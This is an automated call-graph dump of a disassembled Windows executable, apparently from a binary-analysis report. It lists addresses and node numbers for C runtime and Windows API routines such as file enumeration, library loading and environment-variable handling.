7ff72aa714c2 __vcrt_freefls 17888->17890 17891 7ff72aa713bf 17889->17891 17892 7ff72aa80abc _fread_nolock 53 API calls 17892->17894 17894->17886 17894->17892 17895 7ff72aa714ab 17894->17895 17897 7ff72aa72870 59 API calls 17895->17897 17897->17890 17899->17879 17908 7ff72aa73f5a 17907->17908 17909 7ff72aa78bd0 57 API calls 17908->17909 17910 7ff72aa73f82 17909->17910 17911 7ff72aa7be00 _wfindfirst32i64 8 API calls 17910->17911 17912 7ff72aa73faa 17911->17912 17912->17835 17912->17837 17912->17845 17987 7ff72aa731c4 17986->17987 17988 7ff72aa850a4 49 API calls 17987->17988 17989 7ff72aa731ea 17988->17989 17990 7ff72aa731fb 17989->17990 18046 7ff72aa863cc 17989->18046 17992 7ff72aa7be00 _wfindfirst32i64 8 API calls 17990->17992 17993 7ff72aa73219 17992->17993 17993->17788 17995 7ff72aa775ae 17994->17995 17996 7ff72aa73fc0 116 API calls 17995->17996 17997 7ff72aa775dd 17996->17997 18047 7ff72aa863e9 18046->18047 18048 7ff72aa863f5 18046->18048 18088 7ff72aa85578 18048->18088 18310 7ff72aa869bc 18309->18310 18311 7ff72aa869e2 18310->18311 18314 7ff72aa86a15 18310->18314 18312 7ff72aa85aa4 memcpy_s 11 API calls 18311->18312 18313 7ff72aa869e7 18312->18313 18315 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 18313->18315 18316 7ff72aa86a1b 18314->18316 18317 7ff72aa86a28 18314->18317 18318 7ff72aa74019 18315->18318 18319 7ff72aa85aa4 memcpy_s 11 API calls 18316->18319 18328 7ff72aa8b7cc 18317->18328 18318->16425 18319->18318 18341 7ff72aa91298 EnterCriticalSection 18328->18341 18689 7ff72aa89680 18688->18689 18692 7ff72aa8915c 18689->18692 18693 7ff72aa891a6 18692->18693 18694 7ff72aa89177 18692->18694 18702 7ff72aa8594c EnterCriticalSection 18693->18702 18696 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 18694->18696 18704 7ff72aa80563 18703->18704 18705 7ff72aa80591 18703->18705 18715 7ff72aa7c06e RtlLookupFunctionEntry 18714->18715 18716 7ff72aa7be8b 18715->18716 18717 7ff72aa7c084 RtlVirtualUnwind 18715->18717 18718 7ff72aa7be20 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18716->18718 18717->18715 18717->18716 18720 7ff72aa73fc0 116 API calls 18719->18720 18721 7ff72aa715b7 18720->18721 18722 7ff72aa715bf 18721->18722 18723 7ff72aa715e0 18721->18723 18724 7ff72aa72b10 59 API calls 18722->18724 18725 7ff72aa80df4 73 API calls 18723->18725 18727 7ff72aa715cf 18724->18727 18726 7ff72aa715f1 18725->18726 18728 7ff72aa715f5 18726->18728 18730 7ff72aa71611 18726->18730 18727->16453 18729 7ff72aa72870 59 API calls 18728->18729 18741 7ff72aa7160c __vcrt_freefls 18729->18741 18731 7ff72aa71641 18730->18731 18732 7ff72aa71621 18730->18732 18734 7ff72aa71656 18731->18734 18739 7ff72aa7166d 18731->18739 18733 7ff72aa72870 59 API calls 18732->18733 18733->18741 18736 7ff72aa71050 98 API calls 18734->18736 18735 7ff72aa8076c 74 API calls 18737 7ff72aa716e7 18735->18737 18736->18741 18737->16453 18738 7ff72aa80abc _fread_nolock 53 API calls 18738->18739 18739->18738 18740 7ff72aa716ae 18739->18740 18739->18741 18742 7ff72aa72870 59 API calls 18740->18742 18741->18735 18742->18741 18745 7ff72aa719c3 18743->18745 18746 7ff72aa7195f 18743->18746 18744 7ff72aa85650 45 API calls 18744->18746 18745->16471 18746->18744 18746->18745 18748 7ff72aa78bd0 57 API calls 18747->18748 18749 7ff72aa78277 LoadLibraryExW 18748->18749 18750 7ff72aa78294 __vcrt_freefls 18749->18750 18750->16480 18811 7ff72aa75bd0 18810->18811 18812 7ff72aa71ee0 49 API calls 18811->18812 18813 7ff72aa75c02 18812->18813 18814 7ff72aa75c2b 18813->18814 18815 7ff72aa75c0b 18813->18815 18817 7ff72aa75c82 18814->18817 18819 7ff72aa74040 49 API calls 18814->18819 18816 7ff72aa72b10 59 API calls 18815->18816 18837 7ff72aa75c21 18816->18837 18818 7ff72aa74040 49 API calls 18817->18818 18821 7ff72aa75c9b 18818->18821 18820 7ff72aa75c4c 18819->18820 18822 7ff72aa75c6a 18820->18822 18825 7ff72aa72b10 59 API calls 18820->18825 18824 7ff72aa75cb9 18821->18824 18828 7ff72aa72b10 59 API calls 18821->18828 18826 7ff72aa73f50 57 API calls 18822->18826 18823 7ff72aa7be00 _wfindfirst32i64 8 API calls 18827 7ff72aa7344e 18823->18827 18829 7ff72aa78260 58 API calls 18824->18829 18825->18822 18833 7ff72aa75c74 18826->18833 18827->16501 18838 7ff72aa75d20 18827->18838 18828->18824 18830 7ff72aa75cc6 18829->18830 18831 7ff72aa75ced 18830->18831 18832 7ff72aa75ccb 18830->18832 18908 7ff72aa751e0 GetProcAddress 18831->18908 18834 7ff72aa729c0 57 API calls 18832->18834 18833->18817 18836 7ff72aa78260 58 API calls 18833->18836 18834->18837 18836->18817 18837->18823 18992 7ff72aa74de0 18838->18992 18840 7ff72aa75d44 18841 7ff72aa75d5d 18840->18841 18842 7ff72aa75d4c 18840->18842 18999 7ff72aa74520 18841->18999 18843 7ff72aa72b10 59 API calls 18842->18843 18909 7ff72aa75202 18908->18909 18910 7ff72aa75220 GetProcAddress 18908->18910 18912 7ff72aa729c0 57 API calls 18909->18912 18910->18909 18911 7ff72aa75245 GetProcAddress 18910->18911 18911->18909 18913 7ff72aa7526a GetProcAddress 18911->18913 18915 7ff72aa75215 18912->18915 18913->18909 18915->18837 18994 7ff72aa74e05 18992->18994 18993 7ff72aa74e0d 18993->18840 18994->18993 18997 7ff72aa74f9f 18994->18997 19034 7ff72aa87598 18994->19034 18995 7ff72aa7514a __vcrt_freefls 18995->18840 18996 7ff72aa74240 47 API calls 18996->18997 18997->18995 18997->18996 19035 7ff72aa875c8 19034->19035 19038 7ff72aa86a94 19035->19038 19039 7ff72aa86ad7 19038->19039 19040 7ff72aa86ac5 19038->19040 19134 7ff72aa8bcf0 __CxxCallCatchBlock 45 API calls 19133->19134 19135 7ff72aa8af51 19134->19135 19136 7ff72aa8b07c __CxxCallCatchBlock 45 API calls 19135->19136 19137 7ff72aa8af71 19136->19137 19315 7ff72aa7afbc 19316 7ff72aa7a446 19315->19316 19317 7ff72aa7a3c3 19315->19317 19317->19316 19318 7ff72aa7b640 12 API calls 19317->19318 19318->19316 20656 7ff72aa9bca9 20657 7ff72aa9bcc2 20656->20657 20658 7ff72aa9bcb8 20656->20658 20660 7ff72aa912f8 LeaveCriticalSection 20658->20660 19243 7ff72aa8842c 19244 7ff72aa88493 19243->19244 19245 7ff72aa8845a 19243->19245 19244->19245 19247 7ff72aa88498 FindFirstFileExW 19244->19247 19246 7ff72aa85aa4 memcpy_s 11 API calls 19245->19246 19248 7ff72aa8845f 19246->19248 19249 7ff72aa88501 19247->19249 19250 7ff72aa884ba GetLastError 19247->19250 19251 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19248->19251 19303 7ff72aa8869c 19249->19303 19253 7ff72aa884f1 19250->19253 19254 7ff72aa884c5 19250->19254 19255 7ff72aa8846a 19251->19255 19256 7ff72aa85aa4 memcpy_s 11 API calls 19253->19256 19254->19253 19259 7ff72aa884cf 19254->19259 19260 7ff72aa884e1 19254->19260 19262 7ff72aa7be00 _wfindfirst32i64 8 API calls 19255->19262 19256->19255 19258 7ff72aa8869c _wfindfirst32i64 10 API calls 19263 7ff72aa88527 19258->19263 19259->19253 19264 7ff72aa884d4 19259->19264 19261 7ff72aa85aa4 memcpy_s 11 API calls 19260->19261 19261->19255 19265 7ff72aa8847e 19262->19265 19266 7ff72aa8869c _wfindfirst32i64 10 API calls 19263->19266 19267 7ff72aa85aa4 memcpy_s 11 API calls 19264->19267 19268 7ff72aa88535 19266->19268 19267->19255 19269 7ff72aa91434 _wfindfirst32i64 37 API calls 19268->19269 19270 7ff72aa88553 19269->19270 19270->19255 19271 7ff72aa8855f 19270->19271 19272 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19271->19272 19273 7ff72aa88573 19272->19273 19274 7ff72aa8859d 19273->19274 19277 7ff72aa885dc FindNextFileW 19273->19277 19275 7ff72aa85aa4 memcpy_s 11 API calls 19274->19275 19276 7ff72aa885a2 19275->19276 19278 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19276->19278 19279 7ff72aa885eb GetLastError 19277->19279 19280 7ff72aa8862c 19277->19280 19289 7ff72aa885ad 19278->19289 19282 7ff72aa8861f 19279->19282 19283 7ff72aa885f6 19279->19283 19281 7ff72aa8869c _wfindfirst32i64 10 API calls 19280->19281 19285 7ff72aa88644 19281->19285 19284 7ff72aa85aa4 memcpy_s 11 API calls 19282->19284 19283->19282 19286 7ff72aa88600 19283->19286 19287 7ff72aa88612 19283->19287 19284->19289 19290 7ff72aa8869c _wfindfirst32i64 10 API calls 19285->19290 19286->19282 19291 7ff72aa88605 19286->19291 19292 7ff72aa85aa4 memcpy_s 11 API calls 19287->19292 19288 7ff72aa7be00 _wfindfirst32i64 8 API calls 19293 7ff72aa885c0 19288->19293 19289->19288 19294 7ff72aa88652 19290->19294 19296 7ff72aa85aa4 memcpy_s 11 API calls 19291->19296 19292->19289 19295 7ff72aa8869c _wfindfirst32i64 10 API calls 19294->19295 19297 7ff72aa88660 19295->19297 19296->19289 19298 7ff72aa91434 _wfindfirst32i64 37 API calls 19297->19298 19299 7ff72aa8867e 19298->19299 19299->19289 19300 7ff72aa88686 19299->19300 19301 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19300->19301 19302 7ff72aa8869a 19301->19302 19304 7ff72aa886b4 19303->19304 19305 7ff72aa886ba FileTimeToSystemTime 19303->19305 19304->19305 19307 7ff72aa886df 19304->19307 19306 7ff72aa886c9 SystemTimeToTzSpecificLocalTime 19305->19306 19305->19307 19306->19307 19308 7ff72aa7be00 _wfindfirst32i64 8 API calls 19307->19308 19309 7ff72aa88519 19308->19309 19309->19258 19736 7ff72aa91518 19737 7ff72aa9153c 19736->19737 19740 7ff72aa9154c 19736->19740 19738 7ff72aa85aa4 memcpy_s 11 API calls 19737->19738 19739 7ff72aa91541 19738->19739 19741 7ff72aa9182c 19740->19741 19743 7ff72aa9156e 19740->19743 19742 7ff72aa85aa4 memcpy_s 11 API calls 19741->19742 19745 7ff72aa91831 19742->19745 19744 7ff72aa9158f 19743->19744 19867 7ff72aa91bd4 19743->19867 19748 7ff72aa91601 19744->19748 19750 7ff72aa915b5 19744->19750 19757 7ff72aa915f5 19744->19757 19747 7ff72aa8b4ec __free_lconv_num 11 API calls 19745->19747 19747->19739 19752 7ff72aa8f738 memcpy_s 11 API calls 19748->19752 19764 7ff72aa915c4 19748->19764 19749 7ff72aa916ae 19761 7ff72aa916cb 19749->19761 19763 7ff72aa9171d 19749->19763 19882 7ff72aa8a230 19750->19882 19754 7ff72aa91617 19752->19754 19758 7ff72aa8b4ec __free_lconv_num 11 API calls 19754->19758 19756 7ff72aa8b4ec __free_lconv_num 11 API calls 19756->19739 19757->19749 19757->19764 19888 7ff72aa97fdc 19757->19888 19768 7ff72aa91625 19758->19768 19759 7ff72aa915bf 19762 7ff72aa85aa4 memcpy_s 11 API calls 19759->19762 19760 7ff72aa915dd 19760->19757 19767 7ff72aa91bd4 45 API calls 19760->19767 19765 7ff72aa8b4ec __free_lconv_num 11 API calls 19761->19765 19762->19764 19763->19764 19769 7ff72aa9402c 40 API calls 19763->19769 19764->19756 19766 7ff72aa916d4 19765->19766 19777 7ff72aa916d9 19766->19777 19924 7ff72aa9402c 19766->19924 19767->19757 19768->19757 19768->19764 19771 7ff72aa8f738 memcpy_s 11 API calls 19768->19771 19770 7ff72aa9175a 19769->19770 19772 7ff72aa8b4ec __free_lconv_num 11 API calls 19770->19772 19774 7ff72aa91647 19771->19774 19775 7ff72aa91764 19772->19775 19779 7ff72aa8b4ec __free_lconv_num 11 API calls 19774->19779 19775->19764 19775->19777 19776 7ff72aa91820 19781 7ff72aa8b4ec __free_lconv_num 11 API calls 19776->19781 19777->19776 19782 7ff72aa8f738 memcpy_s 11 API calls 19777->19782 19778 7ff72aa91705 19780 7ff72aa8b4ec __free_lconv_num 11 API calls 19778->19780 19779->19757 19780->19777 19781->19739 19783 7ff72aa917a8 19782->19783 19784 7ff72aa917b0 19783->19784 19785 7ff72aa917b9 19783->19785 19786 7ff72aa8b4ec __free_lconv_num 11 API calls 19784->19786 19787 7ff72aa8b01c __std_exception_copy 37 API calls 19785->19787 19789 7ff72aa917b7 19786->19789 19788 7ff72aa917c8 19787->19788 19790 7ff72aa917d0 19788->19790 19791 7ff72aa9185b 19788->19791 19794 7ff72aa8b4ec __free_lconv_num 11 API calls 19789->19794 19933 7ff72aa980f4 19790->19933 19793 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19791->19793 19796 7ff72aa9186f 19793->19796 19794->19739 19799 7ff72aa91898 19796->19799 19804 7ff72aa918a8 19796->19804 19797 7ff72aa917f7 19800 7ff72aa85aa4 memcpy_s 11 API calls 19797->19800 19798 7ff72aa91818 19802 7ff72aa8b4ec __free_lconv_num 11 API calls 19798->19802 19801 7ff72aa85aa4 memcpy_s 11 API calls 19799->19801 19803 7ff72aa917fc 19800->19803 19826 7ff72aa9189d 19801->19826 19802->19776 19806 7ff72aa8b4ec __free_lconv_num 11 API calls 19803->19806 19805 7ff72aa91b8b 19804->19805 19807 7ff72aa918ca 19804->19807 19808 7ff72aa85aa4 memcpy_s 11 API calls 19805->19808 19806->19789 19809 7ff72aa918e7 19807->19809 19952 7ff72aa91cbc 19807->19952 19810 7ff72aa91b90 19808->19810 19813 7ff72aa9195b 19809->19813 19815 7ff72aa9190f 19809->19815 19820 7ff72aa9194f 19809->19820 19812 7ff72aa8b4ec __free_lconv_num 11 API calls 19810->19812 19812->19826 19817 7ff72aa91983 19813->19817 19821 7ff72aa8f738 memcpy_s 11 API calls 19813->19821 19837 7ff72aa9191e 19813->19837 19814 7ff72aa91a0e 19825 7ff72aa91a2b 19814->19825 19834 7ff72aa91a7e 19814->19834 19967 7ff72aa8a26c 19815->19967 19817->19820 19823 7ff72aa8f738 memcpy_s 11 API calls 19817->19823 19817->19837 19819 7ff72aa8b4ec __free_lconv_num 11 API calls 19819->19826 19820->19814 19820->19837 19973 7ff72aa97e9c 19820->19973 19827 7ff72aa91975 19821->19827 19824 7ff72aa919a5 19823->19824 19830 7ff72aa8b4ec __free_lconv_num 11 API calls 19824->19830 19831 7ff72aa8b4ec __free_lconv_num 11 API calls 19825->19831 19832 7ff72aa8b4ec __free_lconv_num 11 API calls 19827->19832 19828 7ff72aa91937 19828->19820 19836 7ff72aa91cbc 45 API calls 19828->19836 19829 7ff72aa91919 19833 7ff72aa85aa4 memcpy_s 11 API calls 19829->19833 19830->19820 19835 7ff72aa91a34 19831->19835 19832->19817 19833->19837 19834->19837 19838 7ff72aa9402c 40 API calls 19834->19838 19841 7ff72aa9402c 40 API calls 19835->19841 19844 7ff72aa91a3a 19835->19844 19836->19820 19837->19819 19839 7ff72aa91abc 19838->19839 19840 7ff72aa8b4ec __free_lconv_num 11 API calls 19839->19840 19842 7ff72aa91ac6 19840->19842 19845 7ff72aa91a66 19841->19845 19842->19837 19842->19844 19843 7ff72aa91b7f 19847 7ff72aa8b4ec __free_lconv_num 11 API calls 19843->19847 19844->19843 19848 7ff72aa8f738 memcpy_s 11 API calls 19844->19848 19846 7ff72aa8b4ec __free_lconv_num 11 API calls 19845->19846 19846->19844 19847->19826 19849 7ff72aa91b0b 19848->19849 19850 7ff72aa91b13 19849->19850 19851 7ff72aa91b1c 19849->19851 19853 7ff72aa8b4ec __free_lconv_num 11 API calls 19850->19853 19852 7ff72aa91434 _wfindfirst32i64 37 API calls 19851->19852 19854 7ff72aa91b2a 19852->19854 19855 7ff72aa91b1a 19853->19855 19856 7ff72aa91bbf 19854->19856 19857 7ff72aa91b32 SetEnvironmentVariableW 19854->19857 19861 7ff72aa8b4ec __free_lconv_num 11 API calls 19855->19861 19860 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19856->19860 19858 7ff72aa91b56 19857->19858 19859 7ff72aa91b77 19857->19859 19862 7ff72aa85aa4 memcpy_s 11 API calls 19858->19862 19864 7ff72aa8b4ec __free_lconv_num 11 API calls 19859->19864 19863 7ff72aa91bd3 19860->19863 19861->19826 19865 7ff72aa91b5b 19862->19865 19864->19843 19866 7ff72aa8b4ec __free_lconv_num 11 API calls 19865->19866 19866->19855 19868 7ff72aa91bf1 19867->19868 19869 7ff72aa91c09 19867->19869 19868->19744 19870 7ff72aa8f738 memcpy_s 11 API calls 19869->19870 19877 7ff72aa91c2d 19870->19877 19871 7ff72aa91cb2 19873 7ff72aa8b07c __CxxCallCatchBlock 45 API calls 19871->19873 19872 7ff72aa91c8e 19874 7ff72aa8b4ec __free_lconv_num 11 API calls 19872->19874 19875 7ff72aa91cb8 19873->19875 19874->19868 19876 7ff72aa8f738 memcpy_s 11 API calls 19876->19877 19877->19871 19877->19872 19877->19876 19878 7ff72aa8b4ec __free_lconv_num 11 API calls 19877->19878 19879 7ff72aa8b01c __std_exception_copy 37 API calls 19877->19879 19880 7ff72aa91c9d 19877->19880 19878->19877 19879->19877 19881 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19880->19881 19881->19871 19883 7ff72aa8a240 19882->19883 19887 7ff72aa8a249 19882->19887 19883->19887 19997 7ff72aa89d08 19883->19997 19887->19759 19887->19760 19889 7ff72aa97fe9 19888->19889 19890 7ff72aa9718c 19888->19890 19893 7ff72aa85578 45 API calls 19889->19893 19891 7ff72aa971cf 19890->19891 19892 7ff72aa97199 19890->19892 19894 7ff72aa971f9 19891->19894 19903 7ff72aa9721e 19891->19903 19895 7ff72aa85aa4 memcpy_s 11 API calls 19892->19895 19898 7ff72aa97140 19892->19898 19902 7ff72aa9801d 19893->19902 19896 7ff72aa85aa4 memcpy_s 11 API calls 19894->19896 19897 7ff72aa971a3 19895->19897 19899 7ff72aa971fe 19896->19899 19904 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19897->19904 19898->19757 19905 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19899->19905 19900 7ff72aa98022 19900->19757 19901 7ff72aa98033 19907 7ff72aa85aa4 memcpy_s 11 API calls 19901->19907 19902->19900 19902->19901 19906 7ff72aa9804a 19902->19906 19912 7ff72aa85578 45 API calls 19903->19912 19917 7ff72aa97209 19903->19917 19908 7ff72aa971ae 19904->19908 19905->19917 19909 7ff72aa98054 19906->19909 19910 7ff72aa98066 19906->19910 19911 7ff72aa98038 19907->19911 19908->19757 19913 7ff72aa85aa4 memcpy_s 11 API calls 19909->19913 19914 7ff72aa98077 19910->19914 19915 7ff72aa9808e 19910->19915 19916 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19911->19916 19912->19917 19918 7ff72aa98059 19913->19918 20214 7ff72aa971dc 19914->20214 20223 7ff72aa99e04 19915->20223 19916->19900 19917->19757 19921 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19918->19921 19921->19900 19923 7ff72aa85aa4 memcpy_s 11 API calls 19923->19900 19925 7ff72aa9406b 19924->19925 19926 7ff72aa9404e 19924->19926 19930 7ff72aa94075 19925->19930 20263 7ff72aa98ae8 19925->20263 19926->19925 19927 7ff72aa9405c 19926->19927 19928 7ff72aa85aa4 memcpy_s 11 API calls 19927->19928 19932 7ff72aa94061 memcpy_s 19928->19932 20270 7ff72aa9149c 19930->20270 19932->19778 19934 7ff72aa85578 45 API calls 19933->19934 19935 7ff72aa9815a 19934->19935 19936 7ff72aa98168 19935->19936 19937 7ff72aa8f9c4 5 API calls 19935->19937 19938 7ff72aa85b64 14 API calls 19936->19938 19937->19936 19939 7ff72aa981c4 19938->19939 19940 7ff72aa98254 19939->19940 19941 7ff72aa85578 45 API calls 19939->19941 19943 7ff72aa98265 19940->19943 19944 7ff72aa8b4ec __free_lconv_num 11 API calls 19940->19944 19942 7ff72aa981d7 19941->19942 19946 7ff72aa8f9c4 5 API calls 19942->19946 19948 7ff72aa981e0 19942->19948 19945 7ff72aa917f3 19943->19945 19947 7ff72aa8b4ec __free_lconv_num 11 API calls 19943->19947 19944->19943 19945->19797 19945->19798 19946->19948 19947->19945 19949 7ff72aa85b64 14 API calls 19948->19949 19950 7ff72aa9823b 19949->19950 19950->19940 19951 7ff72aa98243 SetEnvironmentVariableW 19950->19951 19951->19940 19953 7ff72aa91cfc 19952->19953 19959 7ff72aa91cdf 19952->19959 19954 7ff72aa8f738 memcpy_s 11 API calls 19953->19954 19962 7ff72aa91d20 19954->19962 19955 7ff72aa91d81 19957 7ff72aa8b4ec __free_lconv_num 11 API calls 19955->19957 19956 7ff72aa8b07c __CxxCallCatchBlock 45 API calls 19958 7ff72aa91daa 19956->19958 19957->19959 19959->19809 19960 7ff72aa8f738 memcpy_s 11 API calls 19960->19962 19961 7ff72aa8b4ec __free_lconv_num 11 API calls 19961->19962 19962->19955 19962->19960 19962->19961 19963 7ff72aa91434 _wfindfirst32i64 37 API calls 19962->19963 19964 7ff72aa91d90 19962->19964 19966 7ff72aa91da4 19962->19966 19963->19962 19965 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19964->19965 19965->19966 19966->19956 19968 7ff72aa8a285 19967->19968 19969 7ff72aa8a27c 19967->19969 19968->19828 19968->19829 19969->19968 20282 7ff72aa89d7c 19969->20282 19974 7ff72aa97ea9 19973->19974 19977 7ff72aa97ed6 19973->19977 19975 7ff72aa97eae 19974->19975 19974->19977 19976 7ff72aa85aa4 memcpy_s 11 API calls 19975->19976 19979 7ff72aa97eb3 19976->19979 19978 7ff72aa97f1a 19977->19978 19980 7ff72aa97f39 19977->19980 19995 7ff72aa97f0e __crtLCMapStringW 19977->19995 19982 7ff72aa85aa4 memcpy_s 11 API calls 19978->19982 19981 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19979->19981 19983 7ff72aa97f43 19980->19983 19984 7ff72aa97f55 19980->19984 19985 7ff72aa97ebe 19981->19985 19986 7ff72aa97f1f 19982->19986 19987 7ff72aa85aa4 memcpy_s 11 API calls 19983->19987 19988 7ff72aa85578 45 API calls 19984->19988 19985->19820 19989 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19986->19989 19990 7ff72aa97f48 19987->19990 19991 7ff72aa97f62 19988->19991 19989->19995 19992 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19990->19992 19991->19995 20329 7ff72aa999c0 19991->20329 19992->19995 19995->19820 19996 7ff72aa85aa4 memcpy_s 11 API calls 19996->19995 19998 7ff72aa89d21 19997->19998 19999 7ff72aa89d1d 19997->19999 20020 7ff72aa93240 19998->20020 19999->19887 20012 7ff72aa8a05c 19999->20012 20004 7ff72aa89d3f 20046 7ff72aa89dec 20004->20046 20005 7ff72aa89d33 20006 7ff72aa8b4ec __free_lconv_num 11 API calls 20005->20006 20006->19999 20009 7ff72aa8b4ec __free_lconv_num 11 API calls 20010 7ff72aa89d66 20009->20010 20011 7ff72aa8b4ec __free_lconv_num 11 API calls 20010->20011 20011->19999 20013 7ff72aa8a085 20012->20013 20018 7ff72aa8a09e 20012->20018 20013->19887 20014 7ff72aa90aa8 WideCharToMultiByte 20014->20018 20015 7ff72aa8f738 memcpy_s 11 API calls 20015->20018 20016 7ff72aa8a12e 20017 7ff72aa8b4ec __free_lconv_num 11 API calls 20016->20017 20017->20013 20018->20013 20018->20014 20018->20015 20018->20016 20019 7ff72aa8b4ec __free_lconv_num 11 API calls 20018->20019 20019->20018 20021 7ff72aa89d26 20020->20021 20022 7ff72aa9324d 20020->20022 20026 7ff72aa9357c GetEnvironmentStringsW 20021->20026 20065 7ff72aa8bdc4 20022->20065 20027 7ff72aa89d2b 20026->20027 20028 7ff72aa935ac 20026->20028 20027->20004 20027->20005 20029 7ff72aa90aa8 WideCharToMultiByte 20028->20029 20030 7ff72aa935fd 20029->20030 20031 7ff72aa93604 FreeEnvironmentStringsW 20030->20031 20032 7ff72aa8e19c _fread_nolock 12 API calls 20030->20032 20031->20027 20033 7ff72aa93617 20032->20033 20034 7ff72aa9361f 20033->20034 20035 7ff72aa93628 20033->20035 20036 7ff72aa8b4ec __free_lconv_num 11 API calls 20034->20036 20037 7ff72aa90aa8 WideCharToMultiByte 20035->20037 20038 7ff72aa93626 20036->20038 20039 7ff72aa9364b 20037->20039 20038->20031 20040 7ff72aa9364f 20039->20040 20041 7ff72aa93659 20039->20041 20042 7ff72aa8b4ec __free_lconv_num 11 API calls 20040->20042 20043 7ff72aa8b4ec __free_lconv_num 11 API calls 20041->20043 20044 7ff72aa93657 FreeEnvironmentStringsW 20042->20044 20043->20044 20044->20027 20047 7ff72aa89e11 20046->20047 20048 7ff72aa8f738 memcpy_s 11 API calls 20047->20048 20060 7ff72aa89e47 20048->20060 20049 7ff72aa89e4f 20050 7ff72aa8b4ec __free_lconv_num 11 API calls 20049->20050 20051 7ff72aa89d47 20050->20051 20051->20009 20052 7ff72aa89ec2 20053 7ff72aa8b4ec __free_lconv_num 11 API calls 20052->20053 20053->20051 20054 7ff72aa8f738 memcpy_s 11 API calls 20054->20060 20055 7ff72aa89eb1 20056 7ff72aa8a018 11 API calls 20055->20056 20058 7ff72aa89eb9 20056->20058 20057 7ff72aa8b01c __std_exception_copy 37 API calls 20057->20060 20059 7ff72aa8b4ec __free_lconv_num 11 API calls 20058->20059 20059->20049 20060->20049 20060->20052 20060->20054 20060->20055 20060->20057 20061 7ff72aa89ee7 20060->20061 20063 7ff72aa8b4ec __free_lconv_num 11 API calls 20060->20063 20062 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 20061->20062 20064 7ff72aa89efa 20062->20064 20063->20060 20066 7ff72aa8bdf0 FlsSetValue 20065->20066 20067 7ff72aa8bdd5 FlsGetValue 20065->20067 20068 7ff72aa8bde2 20066->20068 20070 7ff72aa8bdfd 20066->20070 20067->20068 20069 7ff72aa8bdea 20067->20069 20071 7ff72aa8bde8 20068->20071 20072 7ff72aa8b07c __CxxCallCatchBlock 45 API calls 20068->20072 20069->20066 20073 7ff72aa8f738 memcpy_s 11 API calls 20070->20073 20085 7ff72aa92f14 20071->20085 20074 7ff72aa8be65 20072->20074 20075 7ff72aa8be0c 20073->20075 20076 7ff72aa8be2a FlsSetValue 20075->20076 20077 7ff72aa8be1a FlsSetValue 20075->20077 20079 7ff72aa8be36 FlsSetValue 20076->20079 20080 7ff72aa8be48 20076->20080 20078 7ff72aa8be23 20077->20078 20081 7ff72aa8b4ec __free_lconv_num 11 API calls 20078->20081 20079->20078 20082 7ff72aa8ba98 memcpy_s 11 API calls 20080->20082 20081->20068 20083 7ff72aa8be50 20082->20083 20084 7ff72aa8b4ec __free_lconv_num 11 API calls 20083->20084 20084->20071 20108 7ff72aa93184 20085->20108 20087 7ff72aa92f49 20123 7ff72aa92c14 20087->20123 20090 7ff72aa8e19c _fread_nolock 12 API calls 20091 7ff72aa92f77 20090->20091 20092 7ff72aa92f7f 20091->20092 20094 7ff72aa92f8e 20091->20094 20093 7ff72aa8b4ec __free_lconv_num 11 API calls 20092->20093 20105 7ff72aa92f66 20093->20105 20094->20094 20130 7ff72aa932bc 20094->20130 20097 7ff72aa9308a 20098 7ff72aa85aa4 memcpy_s 11 API calls 20097->20098 20099 7ff72aa9308f 20098->20099 20101 7ff72aa8b4ec __free_lconv_num 11 API calls 20099->20101 20100 7ff72aa930e5 20103 7ff72aa9314c 20100->20103 20141 7ff72aa92a44 20100->20141 20101->20105 20102 7ff72aa930a4 20102->20100 20106 7ff72aa8b4ec __free_lconv_num 11 API calls 20102->20106 20104 7ff72aa8b4ec __free_lconv_num 11 API calls 20103->20104 20104->20105 20105->20021 20106->20100 20109 7ff72aa931a7 20108->20109 20110 7ff72aa931b1 20109->20110 20156 7ff72aa91298 EnterCriticalSection 20109->20156 20112 7ff72aa93223 20110->20112 20115 7ff72aa8b07c __CxxCallCatchBlock 45 API calls 20110->20115 20112->20087 20117 7ff72aa9323b 20115->20117 20119 7ff72aa93292 20117->20119 20120 7ff72aa8bdc4 50 API calls 20117->20120 20119->20087 20121 7ff72aa9327c 20120->20121 20122 7ff72aa92f14 65 API calls 20121->20122 20122->20119 20124 7ff72aa85578 45 API calls 20123->20124 20125 7ff72aa92c28 20124->20125 20126 7ff72aa92c34 GetOEMCP 20125->20126 20127 7ff72aa92c46 20125->20127 20128 7ff72aa92c5b 20126->20128 20127->20128 20129 7ff72aa92c4b GetACP 20127->20129 20128->20090 20128->20105 20129->20128 20131 7ff72aa92c14 47 API calls 20130->20131 20132 7ff72aa932e9 20131->20132 20133 7ff72aa9343f 20132->20133 20135 7ff72aa93326 IsValidCodePage 20132->20135 20140 7ff72aa93340 memcpy_s 20132->20140 20134 7ff72aa7be00 _wfindfirst32i64 8 API calls 20133->20134 20136 7ff72aa93081 20134->20136 20135->20133 20137 7ff72aa93337 20135->20137 20136->20097 20136->20102 20138 7ff72aa93366 GetCPInfo 20137->20138 20137->20140 20138->20133 20138->20140 20157 7ff72aa92d2c 20140->20157 20213 7ff72aa91298 EnterCriticalSection 20141->20213 20158 7ff72aa92d69 GetCPInfo 20157->20158 20167 7ff72aa92e5f 20157->20167 20163 7ff72aa92d7c 20158->20163 20158->20167 20159 7ff72aa7be00 _wfindfirst32i64 8 API calls 20161 7ff72aa92efe 20159->20161 20160 7ff72aa93a90 48 API calls 20162 7ff72aa92df3 20160->20162 20161->20133 20168 7ff72aa98a34 20162->20168 20163->20160 20166 7ff72aa98a34 54 API calls 20166->20167 20167->20159 20169 7ff72aa85578 45 API calls 20168->20169 20170 7ff72aa98a59 